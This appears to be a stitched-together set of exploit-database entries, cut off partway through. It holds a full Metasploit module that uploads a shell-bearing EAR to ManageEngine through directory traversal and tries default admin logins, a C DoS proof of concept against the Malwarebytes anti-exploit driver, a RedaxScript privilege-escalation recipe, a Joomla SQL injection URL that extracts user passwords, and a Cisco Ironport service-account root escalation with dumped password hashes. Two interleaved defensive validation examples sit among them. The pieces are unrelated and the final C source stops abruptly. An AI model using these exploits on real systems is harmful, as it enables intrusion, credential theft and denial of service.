
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'ManageEngine Multiple Products Authenticated File Upload',
      'Description'   => %q{
        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
        AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
        the upload does not handle correctly '../' sequences, which can be abused to write
        in the file system. Authentication is needed to exploit this vulnerability, but this module
        will attempt to login using the default credentials for the administrator and guest
        accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
        combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
        versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
        SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
        module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has
        been tested successfully on Windows and Linux against several versions.
      },
      'Author'        =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
        ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          ['CVE', '2014-5301'],
          ['OSVDB', '116733'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
          ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'     => false, # Privileged on Windows but not on Linux targets
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
            {
              'attachment_path' => '/workorder/Attachment.jsp'
            }
          ],
          [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
            {
              'attachment_path' => '/common/FileAttachment.jsp'
            }
          ],
          [ 'IT360 v8-v10.4',
            {
              'attachment_path' => '/common/FileAttachment.jsp'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 15 2014'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('JSESSIONID',
          [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
        OptString.new('IAMAGENTTICKET',
          [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
        OptString.new('USERNAME',
          [true, 'The username to login as', 'guest']),
        OptString.new('PASSWORD',
          [true, 'Password for the specified username', 'guest']),
        OptString.new('DOMAIN_NAME',
          [false, 'Name of the domain to logon to'])
      ], self.class)
  end


  def get_version
    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

    # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenter; it = it360)
    version = [ 9999, 9999, 0, 'sd' ]

    if res && res.code == 200
      if res.body.to_s =~ /ManageEngine ServiceDesk/
        if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
          output = $1
          # Build stays an Integer so the comparisons in check() never raise on a String
          version = [output[0].to_i, output[2].to_i, 0, 'sd']
        end
        if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/     # newer builds
          version[2] = $1.to_i
        elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/   # older builds
          version[2] = $1.to_i
        end
      elsif res.body.to_s =~ /ManageEngine AssetExplorer/
        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
            res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
          output = $1
          version = [output[0].to_i, output[2].to_i, 0, 'ae']
        end
        if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
          version[2] = $1.to_i
        end
      elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
        # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
        version[3] = 'sc'
        if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
          # ... but get the build number if we can find it
          version[2] = $1.to_i
        end
      elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
        # IT360 newer versions
        version[3] = 'it'
      end
    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
      # IT360 older versions, not a very good detection string but there is no alternative?
      version[3] = 'it'
    end

    version
  end


  def check
    version = get_version
    # TODO: put fixed version on the two ifs below once (if...) products are fixed
    # sd was fixed on build 9031
    # ae and sc still not fixed
    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
    (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
    (version[3] == 'sc' && version[2] < 99999)
      return Exploit::CheckCode::Appears
    end

    if (version[2] > 9030 && version[3] == 'sd') ||
        (version[2] > 99999 && version[3] == 'ae') ||
        (version[2] > 99999 && version[3] == 'sc')
      return Exploit::CheckCode::Safe
    else
      # An IT360 check always lands here, there is no way to get the version easily
      return Exploit::CheckCode::Unknown
    end
  end


  def authenticate_it360(port, path, username, password)
    if datastore['DOMAIN_NAME'] == nil
      vars_post = {
        'LOGIN_ID' => username,
        'PASSWORD' => password,
        'isADEnabled' => 'false'
      }
    else
      vars_post = {
        'LOGIN_ID' => username,
        'PASSWORD' => password,
        'isADEnabled' => 'true',
        'domainName' => datastore['DOMAIN_NAME']
      }
    end

    res = send_request_cgi({
      'rport'  => port,
      'method' => 'POST',
      'uri'    => normalize_uri(path),
      'vars_get' => {
        'service'   => 'ServiceDesk',
        'furl'      => '/',
        'timestamp' => Time.now.to_i
      },
      'vars_post' => vars_post
    })

    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
      # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
      return res.get_cookies
    else
      return nil
    end
  end


  def get_it360_cookie_name
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri("/")
    })
    cookie = res.get_cookies
    if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
      return $1
    else
      return nil
    end
  end


  def login_it360
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['IAMAGENTTICKET']
      cookie_name = get_it360_cookie_name
      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
      return cookie
    end

    # get the correct path, host and port
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('/')
    })

    if res && res.redirect?
      uri = [ res.redirection.port, res.redirection.path ]
    else
      return nil
    end

    cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])

    if cookie != nil
      return cookie
    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
      # we've tried with the default guest password, now let's try with the default admin password
      cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
      if cookie != nil
        return cookie
      else
        # Try one more time with the default admin login for some versions
        cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
        if cookie != nil
          return cookie
        end
      end
    end

    nil
  end


  #
  # Authenticate and validate our session cookie. We need to submit credentials to
  # j_security_check and then follow the redirect to HomePage.do to create a valid
  # authenticated session.
  #
  def authenticate(cookie, username, password)
    res = send_request_cgi!({
      'method' => 'POST',
      'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
      'ctype' => 'application/x-www-form-urlencoded',
      'cookie' => cookie,
      'vars_post' => {
        'j_username' => username,
        'j_password' => password,
        'logonDomainName' => datastore['DOMAIN_NAME']
      }
    })
    if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
      # sd and ae respond with 302 while sc responds with a 200
      return true
    else
      return false
    end
  end


  def login
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['JSESSIONID'] != nil
      cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
      return cookie
    end

    # First we get a valid JSESSIONID to pass to authenticate()
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('/')
    })
    if res && res.code == 200
      cookie = res.get_cookies
      authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
      if authenticated
        return cookie
      elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
        # we've tried with the default guest password, now let's try with the default admin password
        authenticated = authenticate(cookie, 'administrator', 'administrator')
        if authenticated
          return cookie
        else
          # Try one more time with the default admin login for some versions
          authenticated = authenticate(cookie, 'admin', 'admin')
          if authenticated
            return cookie
          end
        end
      end
    end

    nil
  end


  def send_multipart_request(cookie, payload_name, payload_str)
    if payload_name =~ /\.ear/
      upload_path = '../../server/default/deploy'
    else
      upload_path = rand_text_alpha(4+rand(4))
    end

    post_data = Rex::MIME::Message.new

    if @my_target == targets[1]
      # old style
      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
      post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
      post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
      post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
      post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
      post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
      post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
      post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
    else
      post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
      post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
    end

    data = post_data.to_s
    res = send_request_cgi({
      'uri' => normalize_uri(@my_target['attachment_path']),
      'method' => 'POST',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => cookie
    })
    return res
  end


  def pick_target
    return target if target.name != 'Automatic'

    version = get_version
    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
    (version[0] == 4 && version[3] == 'ae') ||
    (version[3] == 'sc')
      # These are all "old style" versions (sc is always old style)
      return targets[1]
    elsif version[3] == 'it'
      return targets[3]
    else
      return targets[2]
    end
  end


  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
    end

    print_status("#{peer} - Selecting target...")
    @my_target = pick_target
    print_status("#{peer} - Selected target #{@my_target.name}")

    if @my_target == targets[3]
      cookie = login_it360
    else
      cookie = login
    end

    if cookie.nil?
      fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
    end

    # First we generate the WAR with the payload...
    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => war_app_base })

    # ... and then we create an EAR file that will contain it.
    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
    app_xml << '<application>'
    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"

    # Zipping with CM_STORE to avoid errors while decompressing the zip
    # in the Java vulnerable application
    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
    ear_file.add_file('META-INF/application.xml', app_xml)
    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'

    if @my_target != targets[3]
      # Linux doesn't like it when we traverse non existing directories,
      # so let's create them by sending some random data before the EAR.
      # (IT360 does not have a Linux version so we skip the bogus file for it)
      print_status("#{peer} - Uploading bogus file...")
      res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
      if res && res.code != 200
        fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
      end
    end

    # Now send the actual payload
    print_status("#{peer} - Uploading EAR file...")
    res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful")
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
    end

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
        'method' => 'GET'
      })
      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end
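A defensive counterpart to the traversal the module description relies on, added here as an example and not code from the Metasploit module, from Pedro Ribeiro or from ManageEngine: a C guard that validates a user-supplied upload sub-directory (the role the "module" / "component" form fields play above) before any path is built. The base directory, the per-segment limit and the sample inputs are constructed for the example.

```c
/* Added example, not code from the Metasploit module or from ManageEngine:
 * server-side validation of a user-supplied upload sub-directory. Every
 * segment is checked individually, so "../", "/abs", "a\..\b" and
 * percent-encoded variants are all refused before a path is assembled. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_SEGMENT 64   /* assumed per-segment limit */

/* Returns 1 when `sub` is a relative path made only of plain segments
 * ([A-Za-z0-9._-]+, never "." or ".."), 0 otherwise. */
int is_safe_subdir(const char *sub)
{
    const char *p = sub;

    if (sub == NULL || *sub == '\0') return 0;
    if (sub[0] == '/') return 0;                              /* absolute path */
    if (strchr(sub, '\\') || strchr(sub, '%')) return 0;      /* Windows separator, encoding */

    for (;;) {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        size_t i;

        if (len == 0 || len > MAX_SEGMENT) return 0;          /* "//" or overlong */
        if (len == 1 && p[0] == '.') return 0;                /* "." */
        if (len == 2 && p[0] == '.' && p[1] == '.') return 0; /* ".." */
        for (i = 0; i < len; i++) {
            unsigned char c = (unsigned char)p[i];
            if (!isalnum(c) && c != '_' && c != '-' && c != '.') return 0;
        }
        if (end == NULL) return 1;
        p = end + 1;
        if (*p == '\0') return 0;                             /* trailing "/" */
    }
}

/* A file name is a single safe segment: no separator at all. */
int is_safe_filename(const char *name)
{
    return name != NULL && strchr(name, '/') == NULL && is_safe_subdir(name);
}

/* Builds "<base>/<sub>/<name>" into a static buffer and returns it, or NULL
 * when either component is rejected or the result would not fit. */
const char *build_upload_path(const char *base, const char *sub, const char *name)
{
    static char out[512];
    int n;

    if (!is_safe_subdir(sub) || !is_safe_filename(name)) return NULL;
    n = snprintf(out, sizeof out, "%s/%s/%s", base, sub, name);
    if (n < 0 || (size_t)n >= sizeof out) return NULL;
    return out;
}

int main(void)
{
    const char *base = "/opt/ManageEngine/attachments";   /* constructed base directory */
    const char *tries[] = { "2015/jan", "../../server/default/deploy", "..%2f..%2fdeploy", "/etc" };
    size_t i;

    for (i = 0; i < sizeof tries / sizeof tries[0]; i++) {
        const char *path = build_upload_path(base, tries[i], "report.pdf");
        printf("%-32s -> %s\n", tries[i], path ? path : "REJECTED");
    }
    return 0;
}
```

The check is an allow-list on each segment rather than a search for the literal string `../`, which is why the encoded and backslash forms fall out for free; a prefix comparison after canonicalisation (realpath) is a reasonable second line of defence, but it cannot replace this one because the target directory may not exist yet.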
            
/*

Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date             - 19th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.malwarebytes.org
Tested Version   - 1.03.1.1220, 1.04.1.1012
Driver Version   - no version set - mbae.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/114249
CVE ID           - CVE-2014-100039
Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version    - 1.05
Fixed driver ver - no version set

*/



#include <stdio.h>
#include <string.h>   /* memset, memcpy */
#include <conio.h>    /* getch */
#include <windows.h>

#define BUFSIZE 25


int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;
    BYTE           sizebytes[4] = "\xff\xff\xff\x00";   
    BYTE           *inbuffer;


    printf("-------------------------------------------------------------------------------\n");
    printf("        MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS            \n");
    printf("             Tested on Windows XP SP3/Windows 7 SP1 (32bit)                    \n");
    printf("-------------------------------------------------------------------------------\n\n");

    sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");

    inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    memset(inbuffer, 0x41, BUFSIZE);
    memcpy(inbuffer, sizebytes, sizeof(sizebytes));

    printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	

    printf("\n[~] Press any key to DoS . . .");
    getch();

    DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);

    printf("\n[+] DoS buffer sent\n\n");
 
    CloseHandle(hDevice);

    return 0;
}
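Added example, not code from mbae.sys or from Malwarebytes: a user-mode model of the bounds check that a METHOD_BUFFERED dispatch routine must perform before it trusts a length field that lives inside the caller's own input buffer. The layout (a 4-byte little-endian length followed by data) and the MAX_PAYLOAD cap are assumptions taken from the shape of the PoC above, which sends 0x00ffffff ahead of 21 filler bytes; the real driver's parsing is not on the page.

```c
/* Added example, not driver code: the input validation a kernel handler
 * needs for a caller-controlled buffer whose first four bytes claim how much
 * data follows. Layout and limits are assumptions drawn from the PoC above. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAX_PAYLOAD 4096u   /* assumed upper bound the handler is willing to process */

enum ioctl_status { IOCTL_OK = 0, IOCTL_BUFFER_TOO_SMALL = 1, IOCTL_INVALID_PARAMETER = 2 };

/* Checks the caller-controlled buffer and, on success, stores the number of
 * payload bytes that may be read after the header. Never reads past in_len. */
int validate_ioctl_input(const uint8_t *in, size_t in_len, size_t *payload_len)
{
    uint32_t declared;

    if (in == NULL || payload_len == NULL) return IOCTL_INVALID_PARAMETER;
    if (in_len < 4) return IOCTL_BUFFER_TOO_SMALL;     /* the header itself is missing */

    /* decode byte by byte instead of casting, so alignment and endianness
     * never matter */
    declared = (uint32_t)in[0] | ((uint32_t)in[1] << 8) |
               ((uint32_t)in[2] << 16) | ((uint32_t)in[3] << 24);

    if (declared > MAX_PAYLOAD) return IOCTL_INVALID_PARAMETER;
    if (declared > in_len - 4) return IOCTL_BUFFER_TOO_SMALL; /* would read out of bounds */

    *payload_len = declared;
    return IOCTL_OK;
}

/* Copies the validated payload into `out`; the copy length comes from the
 * validator, never from the header directly. Returns bytes copied or -1. */
int consume_ioctl_input(const uint8_t *in, size_t in_len, uint8_t *out, size_t out_cap)
{
    size_t n;

    if (validate_ioctl_input(in, in_len, &n) != IOCTL_OK) return -1;
    if (n > out_cap) return -1;
    memcpy(out, in + 4, n);
    return (int)n;
}

/* Builds the 25-byte buffer shape from the PoC with the given header value,
 * presents only the first `in_len` bytes of it (capped at 25) and returns
 * the validator's verdict. */
int verdict_for(uint32_t declared, size_t in_len)
{
    uint8_t buf[25];
    size_t n = 0;

    if (in_len > sizeof buf) in_len = sizeof buf;
    memset(buf, 0x41, sizeof buf);
    buf[0] = (uint8_t)declared;
    buf[1] = (uint8_t)(declared >> 8);
    buf[2] = (uint8_t)(declared >> 16);
    buf[3] = (uint8_t)(declared >> 24);
    return validate_ioctl_input(buf, in_len, &n);
}

/* Same buffer, but through the consuming path; returns bytes copied or -1. */
int consume_demo(uint32_t declared)
{
    uint8_t buf[25], out[32];

    memset(buf, 0x41, sizeof buf);
    buf[0] = (uint8_t)declared;
    buf[1] = (uint8_t)(declared >> 8);
    buf[2] = (uint8_t)(declared >> 16);
    buf[3] = (uint8_t)(declared >> 24);
    return consume_ioctl_input(buf, sizeof buf, out, sizeof out);
}

int main(void)
{
    printf("header 0x00ffffff on 25 bytes -> status %d\n", verdict_for(0x00ffffffu, 25));
    printf("header 21 on 25 bytes         -> status %d\n", verdict_for(21, 25));
    printf("header 22 on 25 bytes         -> status %d\n", verdict_for(22, 25));
    printf("header 21 on 3 bytes          -> status %d\n", verdict_for(21, 3));
    return 0;
}
```

In a real driver `in_len` is the InputBufferLength from the IRP stack location and the two rejections map to STATUS_BUFFER_TOO_SMALL and STATUS_INVALID_PARAMETER; the point is that the header value is only ever compared against that trusted length, never used as a copy or read length on its own.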
            
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/
# Version: 2.1.0
# Tested on: Windows 8

#Privilege Escalation in RedaxScript 2.1.0


RedaxScript 2.1.0 suffers from a privilege escalation vulnerability. The
issue occurs because the application fails to properly implement access
controls and also fails to perform proper sanity checks on user-supplied
input before processing it. Together these two flaws allow a vertical
privilege escalation, achieved simply by tampering with the parameter
values. An attacker can exploit this issue to gain elevated privileges
within the application.

*Steps to reproduce the issue:*

·         Log in as a non-admin user.

·         Go to the account page and update the account.

·         Intercept the request, add “*groups[]=1*” to the POST data and
submit the request.

·         Log out of the application and log in again. You can now browse
the application with admin privileges.

This vulnerability was addressed in the following commit.

https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified


*Timeline*:

09-26-2014:         Issue identified

09-27-2014:         Discussion with the vendor

10-27-2014:         Issue confirmed

11-05-2014:         Patch released.




Author:                                Shyamkumar Somana
Vendor Homepage:        http://redaxscript.com/download
Version:                               2.1.0
Tested on:                          Windows 7


Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
in.linkedin.com/in/sshyamkumar/ |
            
source: https://www.securityfocus.com/bid/48223/info

Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users-- 
            
/* 
Cisco Ironport Appliances Privilege Escalation Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s): 
	Cisco Ironport ESA - AsyncOS 8.5.5-280
	Cisco Ironport WSA - AsyncOS 8.0.5-075
	Cisco Ironport SMA - AsyncOS 8.3.6-0
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco

Disclosure Timeline:
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
24-01-2015: Public Disclosure

Description: 
Cisco Ironport appliances are vulnerable to an authenticated "admin" privilege escalation.
Enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, thereby bypassing all existing "admin" account limitations.
The vulnerability is due to a weak algorithm in the password generation process that Cisco uses to remotely access the appliance when providing technical support.

Vendor Response: 
As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE; however, I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as better protecting the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator sets the pass-phrase and enables the account.

[SD] Note: Administrative credentials are needed in order to activate access for the support representative and to set up the pass-phrase that is used to compute the final password.
[GC] Still, the Admin user has limited permissions on the appliance, and credentials can get compromised too, even with the default password, leading to full root access.

[SD] This issue is tracked for the ESA by Cisco bug id CSCuo96011, for the SMA by Cisco bug id CSCuo96056 and for the WSA by Cisco bug id CSCuo90528.


Technical Details:
By logging in to the appliance using the default password "ironport" or a user-specified one, there is an option to enable Customer Support Remote Access.
This option can be found under Help and Support -> Remote Access in the GUI, or by using the CLI console account "enablediag" and issuing the command "service".
Enabling this service requires a temporary user password, which has to be provided along with the appliance serial number to Cisco tech support so they can remotely connect and authenticate to the appliance.

With the temporary password and the serial number of the appliance obtained by enabling the service account, an attacker can in turn get full root access as well as potentially damage the appliance, backdoor it, etc.


PoC:

Enable Service Account
----------------------
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.


AsyncOS 8.5.5 for Cisco C100V build 280

Welcome to the Cisco C100V Email Security Virtual Appliance

Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.

S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service

Service Access is currently disabled.  Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues.  Are you sure you want
to do this?  [Y/N]> Y

Enter a temporary password for customer support to use.  This password may
not be the same as your admin password.  This password will not be able
to be used to directly access your system.
[]> cisco123

Service access has been ENABLED.  Please provide your temporary password
to your IronPort Customer Support representative.

S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com> 


Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe

Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu

Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4

Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4


Login to the appliance as Service account with root privileges
--------------------------------------------------------------
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.


AsyncOS 8.5.5 for Cisco C100V build 280

Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014     auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64  amd64

# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"

#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"

void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);

int main(int argc, char *argv[]) {
